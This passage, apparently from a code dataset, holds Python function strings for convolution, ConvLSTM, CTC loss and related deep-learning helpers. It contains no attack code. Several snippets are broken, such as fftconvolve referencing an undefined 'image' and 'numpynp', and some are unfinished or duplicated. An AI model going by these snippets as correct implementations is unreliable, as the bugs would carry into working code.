Activation(act)(x)\r\n for _ in range(rnn_layers):\r\n x = Bidirectional(LSTM(LSTM_units,\r\n return_sequences=True))(x)\r\n x = Dropout(drop_out)(x)\r\n x = BatchNormalization()(x)\r\n y_pred = TimeDistributed(Dense(self.output_size,\r\n activation='softmax'))(x)\r\n # ctc inputs\r\n labels = Input(name='the_labels', shape=[None, ], dtype='int32')\r\n input_length = Input(name='input_length', shape=[1], dtype='int32')\r\n label_length = Input(name='label_length', shape=[1], dtype='int32')\r\n # Keras doesn't currently support loss funcs with extra parameters\r\n # so CTC loss is implemented in a lambda layer\r\n loss_out = Lambda(ctc_lambda_func,\r\n output_shape=(1,),\r\n name='ctc')([y_pred,\r\n labels,\r\n input_length,\r\n label_length])\r\n self.tm = Model(inputs=i,\r\n outputs=y_pred)\r\n self.m = Model(inputs=[i,\r\n labels,\r\n input_length,\r\n label_length],\r\n outputs=loss_out)\r\n return self.m, self.tm", "def conv2d(args):\n inp_ = args[0]\n kernel = args[1]\n stride = args[2]\n padding = args[3]\n (batch_size, in_channels, H, W) = inp_.shape\n (out_channels, in_channels_t, Hk, Wk) = kernel.shape\n Hc = int((H - Hk)/stride)+1\n Wc = int((W - Wk)/stride)+1\n conv_layer = 
np.zeros((batch_size, out_channels, Hc, Wc))\n for batch_i in range(batch_size):\n for o_chann_i in range(out_channels):\n for in_chann_i in range(in_channels):\n curr_ker = kernel[o_chann_i, in_chann_i, :, :]\n curr_inp = inp_[batch_i, in_chann_i, :, :]\n h_ind = 0\n while h_ind + Hk <= H:\n w_ind = 0\n while w_ind + Wk <= W:\n inp_patch = curr_inp[h_ind:h_ind+Hk, w_ind:w_ind+Wk]\n # Sum the conv_value of all the inp_channels\n conv_layer[batch_i, o_chann_i, h_ind//stride, w_ind//stride] += np.sum(inp_patch*curr_ker)\n w_ind+=stride\n h_ind+=stride\n return conv_layer", "def context_step(inputs, states):\n # <= batch_size, hidden_size\n c_i = K.sum(encoder_out_seq * K.expand_dims(inputs, -1), axis=1)\n if verbose:\n print('ci>', c_i.shape)\n return c_i, [c_i]", "def __call__(self, inputs):\n with tf.variable_scope('conv_t_{}'.format(self.idx)):\n activation_fn = get_act_fn(self.act_fn)\n\n if self.cfg.VAR_ON_CPU:\n kernels = variable_on_cpu(\n name='kernels',\n shape=[self.kernel_size, self.kernel_size,\n self.n_kernel, inputs.get_shape().as_list()[3]],\n initializer=self.w_init_fn,\n dtype=tf.float32)\n conv_t = tf.nn.conv2d_transpose(\n value=inputs,\n filter=kernels,\n output_shape=self.output_shape,\n strides=[1, self.stride, self.stride, 1],\n padding=self.padding)\n\n if self.use_bias:\n biases = variable_on_cpu(\n name='biases',\n shape=[self.n_kernel],\n initializer=tf.zeros_initializer(),\n dtype=tf.float32)\n conv_t = tf.nn.bias_add(conv_t, biases)\n\n if activation_fn is not None:\n conv_t = activation_fn(conv_t)\n\n else:\n biases_initializer = tf.zeros_initializer() if self.use_bias else None\n conv_t = tf.contrib.layers.conv2d_transpose(\n inputs=inputs,\n num_outputs=self.n_kernel,\n kernel_size=self.kernel_size,\n stride=self.stride,\n padding=self.padding,\n activation_fn=activation_fn,\n weights_initializer=self.w_init_fn,\n biases_initializer=biases_initializer)\n\n return conv_t", "def convolve2d(img, kernel):\n #Flip the kernel\n kernel = utils.flip2d(kernel) \n #print(len(kernel))\n \n c = copy.deepcopy(img)\n \n #print(len(c))\n #Padd the image\n pad = int((len(kernel)-1)/2)\n\n\n padded_img = utils.zero_pad(img,pad,pad)\n #print(len(padded_img), len(padded_img[0]))\n #print(len(kernel))\n #print(len(img)**2)\n og_img=[]\n#c = copy.deepcopy(img)\n j=0\n offset = 0\n for m in range(len(img) * len(img[0])): # size of kernel x kernel\n x = []\n \n for i in range(len(kernel)): #3 is kernel size\n #print(i,j)\n x.append(padded_img[i+offset][j:j+len(kernel)])\n #print((x))\n sum = 0\n for k in range(len(kernel)):\n for l in range(len(kernel[0])):\n sum+= x[k][l] * kernel[k][l]\n #print(i,j)\n #print(sum)\n og_img.append(sum) \n j+=1\n if (j == len(img[0])):\n j = 0\n offset+= 1\n \n #print(len(img), len(img[0]))\n final_img = []\n for i in range(0,(len(img)*len(img[0])),len(img[0])):\n final_img.append(og_img[i:i+len(img[0])])\n #print(len(final_img)), len(final_img[0])\n return final_img\n\n # TODO: implement this function.", "def compute_ctc_loss(self, logits, target):\n\n num_time_steps = logits.shape[0]\n num_labels = logits.shape[1] - 1\n num_labels_with_blank = num_labels + 1\n\n # sanity check to ensure targets are all right\n assert (target < num_labels).all()\n\n\t\t######################\n\t\t### YOUR CODE HERE ###\n\t\t######################\n target_length = 2 * target.shape[0] + 1\n\n normalized_logits = softmax(logits)\n alpha = self.compute_forward_variables(normalized_logits, target) \n \n return -np.log(np.sum(alpha[target_length-1, :] \\\n + 
alpha[target_length - 2, :], axis=0))", "def fftconvolve(array, kernel):\n x = numpy.fft.fftshift(numpy.fft.fftn(image))\n y = numpy.fft.fftshift(numpy.fft.fftn(kernel))\n\n return numpy.real(numpynp.fft.fftshift(\n numpy.fft.ifftn(numpy.fft.ifftshift(x * y))))", "def _convs_unoptimized(args, filter_size, num_features, bias, bias_start=0.0, convtype='convolution'):\n\n # Calculate the total size of arguments on dimension 1\n\n total_arg_size_depth = 0\n shapes = [a.get_shape().as_list() for a in args]\n shape_length = len(shapes[0])\n for shape in shapes:\n if len(shape) not in [3, 4, 5]:\n raise ValueError(\"Conv Linear expects 3D, 4D or 5D arguments: %s\" % str(shapes))\n if len(shape) != len(shapes[0]):\n raise ValueError(\"Conv Linear expects all args to be of same Dimension: %s\" % str(shapes))\n else:\n total_arg_size_depth += shape[-1]\n dtype = [a.dtype for a in args][0]\n\n if shape_length != 4 and convtype == \"separable\":\n print ('[ERROR] separable convLSTM is only implemented for conv2D')\n raise NotImplementedError \n\n if len(args) != 2:\n print ('LSTM is only implemented with len(args) = 2!')\n raise NotImplementedError\n\n # Determine correct conv operation\n\n c_i = shapes[0][-1] # number of input channels per tensor in args\n c_o = num_features//4 # number of output channels per gate and cell state\n\n if convtype == 'separable': \n if shape_length == 3:\n conv_op = tf.nn.separable_conv1d # ? does not exist\n strides = 1\n elif shape_length == 4:\n conv_op = tf.nn.separable_conv2d\n strides = shape_length * [1]\n elif shape_length == 5:\n conv_op = tf.nn.separable_conv3d # ? does not exist\n strides = shape_length * [1]\n else:\n raise NotImplementedError\n channel_multiplier = 1\n elif convtype == 'depthwise': \n if shape_length == 3:\n conv_op = tf.nn.depthwise_conv1d # ? does not exist\n strides = 1\n elif shape_length == 4:\n conv_op = tf.nn.depthwise_conv2d\n strides = shape_length * [1]\n elif shape_length == 5:\n conv_op = tf.nn.depthwise_conv3d # ? 
does not exist\n strides = shape_length * [1]\n else:\n raise NotImplementedError\n channel_multiplier = 1\n else: # Normal CONV and spatially separable CONV\n if shape_length == 3:\n conv_op = nn_ops.conv1d\n strides = 1\n elif shape_length == 4:\n conv_op = nn_ops.conv2d\n strides = shape_length * [1]\n elif shape_length == 5:\n conv_op = nn_ops.conv3d\n strides = shape_length * [1]\n else:\n raise NotImplementedError\n\n # Now the computation\n\n if convtype == 'spatial':\n # Get kernels\n\n kernel_h = vs.get_variable(\"kernel_h\", [filter_size[0], 1, total_arg_size_depth, num_features], dtype=dtype)\n print('kernel_h: ', [filter_size[0], 1, total_arg_size_depth, num_features])\n kernel_w = vs.get_variable(\"kernel_w\", [1, filter_size[1], total_arg_size_depth, num_features], dtype=dtype)\n print('kernel_w: ', [1, filter_size[1], total_arg_size_depth, num_features])\n\n W_ix_h = kernel_h[..., 0:c_i, 0:1*c_o] # Name pattern: W(eights) for i(nput gate) for h(eight) CONV with x\n W_ih_h = kernel_h[..., c_i:2*c_i, 0:1*c_o]\n W_cx_h = kernel_h[..., 0:c_i, 1*c_o:2*c_o]\n W_ch_h = kernel_h[..., c_i:2*c_i, 1*c_o:2*c_o]\n W_fx_h = kernel_h[..., 0:c_i, 2*c_o:3*c_o]\n W_fh_h = kernel_h[..., c_i:2*c_i, 2*c_o:3*c_o]\n W_ox_h = kernel_h[..., 0:c_i, 3*c_o:4*c_o]\n W_oh_h = kernel_h[..., c_i:2*c_i, 3*c_o:4*c_o]\n\n W_ix_w = kernel_w[..., 0:c_i, 0:1*c_o]\n W_ih_w = kernel_w[..., c_i:2*c_i, 0:1*c_o]\n W_cx_w = kernel_w[..., 0:c_i, 1*c_o:2*c_o]\n W_ch_w = kernel_w[..., c_i:2*c_i, 1*c_o:2*c_o]\n W_fx_w = kernel_w[..., 0:c_i, 2*c_o:3*c_o]\n W_fh_w = kernel_w[..., c_i:2*c_i, 2*c_o:3*c_o]\n W_ox_w = kernel_w[..., 0:c_i, 3*c_o:4*c_o]\n W_oh_w = kernel_w[..., c_i:2*c_i, 3*c_o:4*c_o]\n\n # input gate\n\n i_x_h = conv_op(args[0], W_ix_h, strides, padding=\"SAME\")\n i_x = conv_op(i_x_h, W_ix_w, strides, padding=\"SAME\")\n i_h_h = conv_op(args[1], W_ih_h, strides, padding=\"SAME\")\n i_h = conv_op(i_h_h, W_ih_w, strides, padding=\"SAME\")\n\n # new input (= intermediate step for new cell state)\n\n c_x_h = conv_op(args[0], W_cx_h, strides, padding=\"SAME\")\n c_x = conv_op(c_x_h, W_cx_w, strides, padding=\"SAME\")\n c_h_h = conv_op(args[1], W_ch_h, strides, padding=\"SAME\")\n c_h = conv_op(c_h_h, W_ch_w, strides, padding=\"SAME\")\n\n # forget gate\n\n f_x_h = conv_op(args[0], W_fx_h, strides, padding=\"SAME\")\n f_x = conv_op(f_x_h, W_fx_w, strides, padding=\"SAME\")\n f_h_h = conv_op(args[1], W_fh_h, strides, padding=\"SAME\")\n f_h = conv_op(f_h_h, W_fh_w, strides, padding=\"SAME\")\n\n # output gate\n\n o_x_h = conv_op(args[0], W_ox_h, strides, padding=\"SAME\")\n o_x = conv_op(o_x_h, W_ox_w, strides, padding=\"SAME\")\n o_h_h = conv_op(args[1], W_oh_h, strides, padding=\"SAME\")\n o_h = conv_op(o_h_h, W_oh_w, strides, padding=\"SAME\")\n\n # sum up results\n \n res_x = array_ops.concat(axis=shape_length - 1, values=[i_x, c_x, f_x, o_x])\n res_h = array_ops.concat(axis=shape_length - 1, values=[i_h, c_h, f_h, o_h])\n res = tf.add(res_x, res_h)\n\n elif convtype == 'depthwise':\n # Get kernels\n\n kernel_depth = vs.get_variable(\"kernel_depth\", filter_size + [total_arg_size_depth, 4*channel_multiplier],\n dtype=dtype)\n print('kernel_depth: ', filter_size + [total_arg_size_depth, 4*channel_multiplier])\n\n W_ix = kernel_depth[..., 0:c_i, 0:1*channel_multiplier]\n W_ih = kernel_depth[..., c_i:2*c_i, 0:1*channel_multiplier]\n W_cx = kernel_depth[..., 0:c_i, 1*channel_multiplier:2*channel_multiplier]\n W_ch = kernel_depth[..., c_i:2*c_i, 1*channel_multiplier:2*channel_multiplier]\n W_fx = kernel_depth[..., 
0:c_i, 2*channel_multiplier:3*channel_multiplier]\n W_fh = kernel_depth[..., c_i:2*c_i, 2*channel_multiplier:3*channel_multiplier]\n W_ox = kernel_depth[..., 0:c_i, 3*channel_multiplier:4*channel_multiplier]\n W_oh = kernel_depth[..., c_i:2*c_i, 3*channel_multiplier:4*channel_multiplier]\n\n # input gate\n\n i_x = conv_op(args[0], W_ix, strides, padding=\"SAME\")\n i_h = conv_op(args[1], W_ih, strides, padding=\"SAME\")\n\n # new input (= intermediate step for new cell state)\n\n c_x = conv_op(args[0], W_cx, strides, padding=\"SAME\")\n c_h = conv_op(args[1], W_ch, strides, padding=\"SAME\")\n\n # forget gate\n\n f_x = conv_op(args[0], W_fx, strides, padding=\"SAME\")\n f_h = conv_op(args[1], W_fh, strides, padding=\"SAME\")\n\n # output gate\n\n o_x = conv_op(args[0], W_ox, strides, padding=\"SAME\")\n o_h = conv_op(args[1], W_oh, strides, padding=\"SAME\")\n\n # sum up results\n \n res_x = array_ops.concat(axis=shape_length - 1, values=[i_x, c_x, f_x, o_x])\n res_h = array_ops.concat(axis=shape_length - 1, values=[i_h, c_h, f_h, o_h])\n res = tf.add(res_x, res_h)\n\n elif convtype == 'separable':\n # Get kernels\n\n kernel_depth = vs.get_variable(\"kernel_depth\", filter_size + [total_arg_size_depth, 4*channel_multiplier],\n dtype=dtype)\n print('kernel_depth: ', filter_size + [total_arg_size_depth, 4*channel_multiplier])\n kernel_sep = vs.get_variable(\"kernel_sep\", [1, 1, total_arg_size_depth, num_features], dtype=dtype)\n print('kernel_sep: ', [1, 1, total_arg_size_depth, num_features])\n\n W_ix = kernel_depth[..., 0:c_i, 0:1*channel_multiplier]\n W_ih = kernel_depth[..., c_i:2*c_i, 0:1*channel_multiplier]\n W_cx = kernel_depth[..., 0:c_i, 1*channel_multiplier:2*channel_multiplier]\n W_ch = kernel_depth[..., c_i:2*c_i, 1*channel_multiplier:2*channel_multiplier]\n W_fx = kernel_depth[..., 0:c_i, 2*channel_multiplier:3*channel_multiplier]\n W_fh = kernel_depth[..., c_i:2*c_i, 2*channel_multiplier:3*channel_multiplier]\n W_ox = kernel_depth[..., 0:c_i, 3*channel_multiplier:4*channel_multiplier]\n W_oh = kernel_depth[..., c_i:2*c_i, 3*channel_multiplier:4*channel_multiplier]\n\n Wsep_ix = kernel_sep[..., 0:c_i, 0:1*c_o]\n Wsep_ih = kernel_sep[..., c_i:2*c_i, 0:1*c_o]\n Wsep_cx = kernel_sep[..., 0:c_i, 1*c_o:2*c_o]\n Wsep_ch = kernel_sep[..., c_i:2*c_i, 1*c_o:2*c_o]\n Wsep_fx = kernel_sep[..., 0:c_i, 2*c_o:3*c_o]\n Wsep_fh = kernel_sep[..., c_i:2*c_i, 2*c_o:3*c_o]\n Wsep_ox = kernel_sep[..., 0:c_i, 3*c_o:4*c_o]\n Wsep_oh = kernel_sep[..., c_i:2*c_i, 3*c_o:4*c_o]\n\n # input gate\n\n i_x = conv_op(args[0], W_ix, Wsep_ix, strides, padding=\"SAME\")\n i_h = conv_op(args[1], W_ih, Wsep_ih, strides, padding=\"SAME\")\n\n # new input (= intermediate step for new cell state)\n\n c_x = conv_op(args[0], W_cx, Wsep_cx, strides, padding=\"SAME\")\n c_h = conv_op(args[1], W_ch, Wsep_ch, strides, padding=\"SAME\")\n\n # forget gate\n\n f_x = conv_op(args[0], W_fx, Wsep_fx, strides, padding=\"SAME\")\n f_h = conv_op(args[1], W_fh, Wsep_fh, strides, padding=\"SAME\")\n\n # output gate\n\n o_x = conv_op(args[0], W_ox, Wsep_ox, strides, padding=\"SAME\")\n o_h = conv_op(args[1], W_oh, Wsep_oh, strides, padding=\"SAME\")\n\n # sum up results\n \n res_x = array_ops.concat(axis=shape_length - 1, values=[i_x, c_x, f_x, o_x])\n res_h = array_ops.concat(axis=shape_length - 1, values=[i_h, c_h, f_h, o_h])\n res = tf.add(res_x, res_h)\n\n else: # normal CONV\n # Get kernel\n\n kernel = vs.get_variable(\"kernel\", filter_size + [total_arg_size_depth, 4*c_o], dtype=dtype)\n print('kernel: ', filter_size + 
[total_arg_size_depth, 4*c_o])\n\n W_ix = kernel[..., 0:c_i, 0:1*c_o]\n W_ih = kernel[..., c_i:2*c_i, 0:1*c_o]\n W_cx = kernel[..., 0:c_i, 1*c_o:2*c_o]\n W_ch = kernel[..., c_i:2*c_i, 1*c_o:2*c_o]\n W_fx = kernel[..., 0:c_i, 2*c_o:3*c_o]\n W_fh = kernel[..., c_i:2*c_i, 2*c_o:3*c_o]\n W_ox = kernel[..., 0:c_i, 3*c_o:4*c_o]\n W_oh = kernel[..., c_i:2*c_i, 3*c_o:4*c_o]\n\n # input gate\n\n i_x = conv_op(args[0], W_ix, strides, padding=\"SAME\")\n i_h = conv_op(args[1], W_ih, strides, padding=\"SAME\")\n\n # new input (= intermediate step for new cell state)\n\n c_x = conv_op(args[0], W_cx, strides, padding=\"SAME\")\n c_h = conv_op(args[1], W_ch, strides, padding=\"SAME\")\n\n # forget gate\n\n f_x = conv_op(args[0], W_fx, strides, padding=\"SAME\")\n f_h = conv_op(args[1], W_fh, strides, padding=\"SAME\")\n\n # output gate\n\n o_x = conv_op(args[0], W_ox, strides, padding=\"SAME\")\n o_h = conv_op(args[1], W_oh, strides, padding=\"SAME\")\n\n # sum up results\n \n res_x = array_ops.concat(axis=shape_length - 1, values=[i_x, c_x, f_x, o_x])\n res_h = array_ops.concat(axis=shape_length - 1, values=[i_h, c_h, f_h, o_h])\n res = tf.add(res_x, res_h)\n \n if not bias:\n return res\n bias_term = vs.get_variable(\"biases\", [num_features], dtype=dtype,\n initializer=init_ops.constant_initializer(bias_start, dtype=dtype))\n return res + bias_term", "def complexity_conv2d(cx, w_in, w_out, k, stride, padding, groups=1, bias=False):\n h, w, flops, params, acts = cx[\"h\"], cx[\"w\"], cx[\"flops\"], cx[\"params\"], cx[\"acts\"]\n h = (h + 2 * padding - k) // stride + 1\n w = (w + 2 * padding - k) // stride + 1\n flops += k * k * w_in * w_out * h * w // groups\n params += k * k * w_in * w_out // groups\n flops += w_out if bias else 0\n params += w_out if bias else 0\n acts += w_out * h * w\n return {\"h\": h, \"w\": w, \"flops\": flops, \"params\": params, \"acts\": acts}", "def diffnc(X, dt):\n [traj_length, D] = X.shape\n XX = np.zeros((traj_length + 2, D))\n for d in range(D):\n XX[:, d] = np.convolve(X[:, d], np.array([1, 0, -1]) / 2.0 / dt)\n\n X = XX[1:traj_length + 1, :]\n X[0, :] = X[1, :]\n X[traj_length - 1, :] = X[traj_length - 2, :]\n\n return X", "def epochs_for_cycles(self, cycles: int) -> int:\n cnt = self.warmup\n n = self.n0\n for _ in range(cycles):\n cnt += n\n n = int(round(n * self.length_scale))\n return cnt", "def get_iterations(train_length: int, batch_size: int, epochs: int) -> int:\n return train_length // batch_size * epochs", "def get_conv1d_output_size(input_size, kernel_size, stride):\n return ((input_size - kernel_size)//stride) + 1", "def get_conv1d_output_size(input_size, kernel_size, stride):\n return ((input_size - kernel_size)//stride) + 1", "def convolve(img, fourier_kernel):\n return np.fft.ifftshift(np.fft.irfft2(np.fft.rfft2(img) * fourier_kernel))", "def compute(self, node, input_vals):\r\n #assert len(input_vals) == 2\r\n #start = time.time()\r\n strides = node.const_attr\r\n ish = list(input_vals[0].shape)\r\n fsh = list(input_vals[1].shape)\r\n filter = input_vals[1].astype(float32)\r\n input = np.zeros((ish[0],ish[1]+fsh[0]-1,ish[2]+fsh[1]-1,ish[3])).astype(float32)\r\n input[:,fsh[0]//2:fsh[0]//2+ish[1]:1,fsh[1]//2:fsh[1]//2+ish[2]:1,:]+=input_vals[0].astype(float32)\r\n ish = list(input.shape)\r\n output = np.zeros([ish[0],(ish[1]-fsh[0])//strides[1]+1,(ish[2]-fsh[1])//strides[2]+1,fsh[3]]).astype(float32)\r\n osh = output.shape\r\n\r\n assert c_kernel.conv2d_c(get_pointer(input), 
ish[0],ish[1],ish[2],ish[3],get_pointer(filter),fsh[0],fsh[1],fsh[2],fsh[3],strides[0],strides[1],strides[2],strides[3],get_pointer(output), osh[0],osh[1],osh[2],osh[3])==0\r\n #print(\"conv2d\") \r\n #end = time.time()\r\n\r\n #print(end - start) \r\n return output\r\n \r\n '''\r\n rm = range(osh[0])\r\n ri = range(osh[1])\r\n rj = range(osh[2])\r\n rdi = range(fsh[0])\r\n rdj = range(fsh[1])\r\n for m in rm:\r\n for i in ri:\r\n for j in rj:\r\n for di in rdi:\r\n for dj in rdj:\r\n print(input[m,strides[1]*i+di,strides[2]*j+dj,:])\r\n print(filter[di,dj,:,:])\r\n t = np.dot(\r\n input[m,strides[1]*i+di,strides[2]*j+dj,:],\r\n filter[di,dj,:,:]\r\n )\r\n output[m,i,j] = np.sum(\r\n [\r\n t,\r\n output[m,i,j]\r\n ],\r\n axis=0\r\n )\r\n #print(\"type(output)\")\r\n #print(type(output))\r\n return output\r\n '''", "def time_conv_block(model, nb_layers, nb_filters):\n\n for _ in range(nb_layers):\n model = time_conv_layer(model, nb_filters)\n model = MaxPooling1D()(model)\n model = Dropout(0.1)(model)\n return model", "def _conv_block( inputs, filters, kernel, strides, nl):\n channel_axis = 1 if K.image_data_format() == 'channels_first' else -1\n x = Conv2D(filters, kernel, padding='same', strides=strides)(inputs)\n x = BatchNormalization(axis=channel_axis)(x)\n return _return_activation(x, nl)", "def call(self, inputs, state):\n dtype = inputs.dtype\n input_size = inputs.get_shape().with_rank(4)[3]\n if input_size.value is None:\n raise ValueError('Could not infer size from inputs.get_shape()[-1]')\n\n c_prev, m_prev = state\n inputs = tf.concat([inputs, m_prev], axis=-1)\n\n if not self._w_conv:\n scope = tf.get_variable_scope()\n with tf.variable_scope(scope, initializer=self._initializer):\n kernel_shape = self._kernel + [inputs.shape[-1].value, 4 * self._depth]\n self._w_conv = tf.get_variable('w_conv', shape=kernel_shape, dtype=dtype)\n\n # i = input_gate, j = new_input, f = forget_gate, o = ouput_gate\n conv = tf.nn.conv2d(inputs, self._w_conv, (1, 1, 1, 1), 'SAME')\n i, j, f, o = tf.split(conv, 4, axis=-1)\n\n # Diagonal connections\n if self._use_peepholes and not self._w_f_diag:\n scope = tf.get_variable_scope()\n with tf.variable_scope(scope, initializer=self._initializer):\n self._w_f_diag = tf.get_variable('w_f_diag', c_prev.shape[1:], dtype=dtype)\n self._w_i_diag = tf.get_variable('w_i_diag', c_prev.shape[1:], dtype=dtype)\n self._w_o_diag = tf.get_variable('w_o_diag', c_prev.shape[1:], dtype=dtype)\n\n if self._use_peepholes:\n f = f + self._w_f_diag * c_prev\n i = i + self._w_i_diag * c_prev\n if self._normalize is not None:\n f = self._normalize(f)\n i = self._normalize(i)\n j = self._normalize(j)\n\n j = self._activation(j)\n\n if self._dropout is not None:\n j = tf.nn.dropout(j, self._dropout)\n\n c = tf.nn.sigmoid(f + self._forget_bias) * c_prev + tf.nn.sigmoid(i) * j\n\n if self._cell_clip is not None:\n # pylint: disable=invalid-unary-operand-type\n c = tf.clip_by_value(c, -self._cell_clip, self._cell_clip)\n # pylint: enable=invalid-unary-operand-type\n if self._use_peepholes:\n o = o + self._w_o_diag * c\n if self._normalize is not None:\n o = self._normalize(o)\n c = self._normalize(c)\n\n m = tf.nn.sigmoid(o) * self._activation(c)\n\n new_state = tf.nn.rnn_cell.LSTMStateTuple(c, m)\n return m, new_state", "def Get_Convolution(label, radius, feature_dict, pad = True, convert_length = 0.2204315, verbose = False, \n path = '', filename = '', meta = None):\n ## Make convolution at specified radius\n r = round(radius / convert_length)\n num_class = len(feature_dict)\n 
## Create circular filter window\n x = np.arange(0, 2*r)\n y = np.arange(0, 2*r)\n mask = (x[np.newaxis,:]-r)**2 + (y[:,np.newaxis]-r)**2 < r**2 \n mask = mask[:,:,np.newaxis, np.newaxis]\n mask_tensor = tf.constant(mask, tf.float32)\n\n expanded_label = Expand_Mask(label, feature_dict)\n lab_shape = expanded_label.shape\n all_lab = np.zeros((lab_shape[0] - mask.shape[0] + 1, lab_shape[1] - mask.shape[1] + 1, num_class))\n for val in range(num_class): \n ohe_layer = expanded_label[:,:,val]\n ohe_tensor = tf.constant(ohe_layer[np.newaxis, :, :, np.newaxis], tf.float32)\n tensor_res = tf.nn.convolution(ohe_tensor, mask_tensor, padding='VALID') \n all_lab[:,:,val] = tensor_res.numpy()[0,:,:,0]\n if verbose:\n print('Finished: ' + str(val))\n \n if pad:\n array_shape = label.shape\n # up-down padding\n tot_pw_ud = (array_shape[0] - all_lab.shape[0])/2\n pw_up = int(np.ceil(tot_pw_ud))\n pw_down = int(np.floor(tot_pw_ud))\n # left-right padding\n tot_pw_lr = (array_shape[1] - all_lab.shape[1])/2\n pw_left = int(np.ceil(tot_pw_lr))\n pw_right = int(np.floor(tot_pw_lr))\n all_lab_pad = np.pad(all_lab, pad_width = ((pw_down, pw_up), (pw_left, pw_right), (0,0)), \n mode = 'constant', constant_values = 255)\n \n if filename !='':\n try:\n if path == '':\n path = 'Predictions'\n os.makedirs(path)\n except OSError as error: \n print('') \n \n meta.update(count = num_class, nodata = 255, compress = 'deflate', predictor = 2)\n \n # Write raster label to file\n tif_lab_pad = np.moveaxis(all_lab_pad,-1,0)\n with rasterio.open(path + '/' + filename + '.tif', 'w', **meta) as src:\n src.write(tif_lab_pad) \n return all_lab_pad", "def forward(\n self, input: torch.Tensor, input_lengths: torch.Tensor\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n input_size = input.size()\n B = input_size[0]\n T = input_size[1]\n C = self.channels\n D = self.win_length\n # (B, T, C) --> (T, B, C)\n continuous = input.view(B, T, C).permute(1, 0, 2)\n windowed = continuous.unfold(0, D, self.hop_length)\n # (T, B, C, D) --> (B, T, C, D)\n output = windowed.permute(1, 0, 2, 3).contiguous()\n # After unfold(), windowed lengths change:\n output_lengths = (\n torch.div(\n input_lengths - self.win_length, self.hop_length, rounding_mode=\"trunc\"\n )\n + 1\n )\n return output, output_lengths", "def conv1d_reduce_sum(x, input_length, padding, stride):\n # Sum over the output channels.\n lam_sum = tf.reduce_sum(x, axis=3)\n\n num_classes = x.shape[0].value\n batch_size = tf.shape(x)[1]\n kernel_length = x.shape[4].value\n input_channels = x.shape[5].value\n\n # Temporarily combine the (num_classes, batch_size, in_layer_channels) dims\n # while applying a transpose convolution.\n # Also use (kernel_length) as the channels\n # as we'll apply the transpose convolution to each kernel point separately.\n lam_squeezed = tf.transpose(lam_sum, perm=[0, 1, 4, 2, 3])\n lam_squeezed = tf.reshape(lam_squeezed, shape=(\n [num_classes * batch_size * input_channels] +\n x.shape[2:3].as_list() +\n [kernel_length]))\n\n # De-convolve each elementary (i.e. 
one-hot) filter with the corresponding\n # slice of lambda.\n diagonal_kernel = tf.reshape(\n tf.eye(kernel_length, dtype=x.dtype),\n shape=[kernel_length, 1, kernel_length])\n lam_deconv = tf.nn.conv1d_transpose(\n lam_squeezed,\n diagonal_kernel,\n output_shape=([num_classes * batch_size * input_channels] +\n [input_length, 1]),\n padding=padding,\n strides=stride)\n\n # The resulting de-convolution has shape\n # (num_classes*batch_size*in_layer_channels,\n # in_layer_length, 1).\n # Make it match mu_in.\n result = tf.reshape(lam_deconv, shape=(\n [num_classes, batch_size, input_channels] +\n lam_deconv.shape[1:2].as_list()))\n return tf.transpose(result, perm=[0, 1, 3, 2])", "def apply_ccms(images, ccms):\n images.shape.assert_has_rank(4)\n images = images[:, :, :, tf.newaxis, :]\n ccms = ccms[:, tf.newaxis, tf.newaxis, :, :]\n return tf.reduce_sum(images * ccms, axis=-1)", "def conv1d(data_arr, kernel_arr, tarr_len, discrete_kernel_shape, mode='valid'):\n\n assert(data_arr.ndim == 2)\n output_shape = discrete_kernel_shape[1:]\n if (kernel_arr.ndim == 2):\n # Algorithm assumes a \"to\" axis on the kernel. Add it.\n kernel_arr = add_axes(kernel_arr, 1, 'before last')\n discrete_kernel_shape = discrete_kernel_shape[0:1] + (1,) + discrete_kernel_shape[1:2]\n else:\n check(kernel_arr.ndim == 3)\n\n # Convolutions leave the time component on the inside, but we want it on the outside\n # So we do the iterations in reverse order, and flip the result with transpose()\n # The result is indexed as [tidx][to idx][from idx]\n if cf.use_theano:\n # We use slices from_idx:from_idx+1 because conv2d expects 2D objects\n # We then index [:,0] to remove the spurious dimension\n result = T.stack(\n [ T.stack(\n [ T.signal.conv.conv2d(data_arr[:, from_idx:from_idx+1 ],\n kernel_arr[:, to_idx, from_idx:from_idx+1 ],\n image_shape = (tarr_len, 1),\n filter_shape = (discrete_kernel_shape[0], 1),\n border_mode = mode)[:,0]\n for to_idx in np.arange(discrete_kernel_shape[1]) ] )\n for from_idx in np.arange(discrete_kernel_shape[2]) ] ).T\n else:\n assert(discrete_kernel_shape == kernel_arr.shape)\n assert(tarr_len == data_arr.shape[0])\n result = np.stack(\n [ np.stack(\n [ scipy.signal.convolve(data_arr[:, from_idx ],\n kernel_arr[:, to_idx, from_idx ],\n mode=mode)\n for to_idx in np.arange(kernel_arr.shape[1]) ] )\n for from_idx in np.arange(kernel_arr.shape[2]) ] ).T\n\n return result.reshape((tarr_len - discrete_kernel_shape[0] + 1,) + output_shape)", "def concentration(self, time: float) -> _VectorisedFloat:\n return (self._normed_concentration_cached(time) * \n self.normalization_factor())", "def convolveUsingTime(filename, out, altitude=10000, dt_mes=1e-9, height=8, firstOrder=False):\n\n # b = const.LIGHT_SPEED * dt_mes # width of bin in terms of length [m]\n # num_bin = int(np.ceil(height / b) * 2)\n # bins = np.linspace(altitude * 2 - b * (num_bin // 2), altitude * 2 + b * (num_bin // 2), num_bin, endpoint=False)\n bins = []\n bins.append(0)\n time = dt_mes * 1e9\n while time * C / 1e9 <= height:\n bins.append(time)\n bins.append(-time)\n time += dt_mes * 1e9\n bins.sort()\n num_bin = len(bins)\n bins = np.array(bins)\n times = np.array(bins)\n bins = bins + 2 * altitude / C * 1e9 # - altitude * 1e9 / const.LIGHT_SPEED % (dt_mes * 1e9 / 2)\n print('convolveUsingTime')\n # print(bins)\n\n f = np.zeros(num_bin) # contain the accumulated energy input\n\n # read file\n data = np.loadtxt(filename)\n if len(data.shape) == 1:\n data = np.array([data])\n\n length = data[:, INDEX_OF_TIME] / C * 1e9\n energy = 
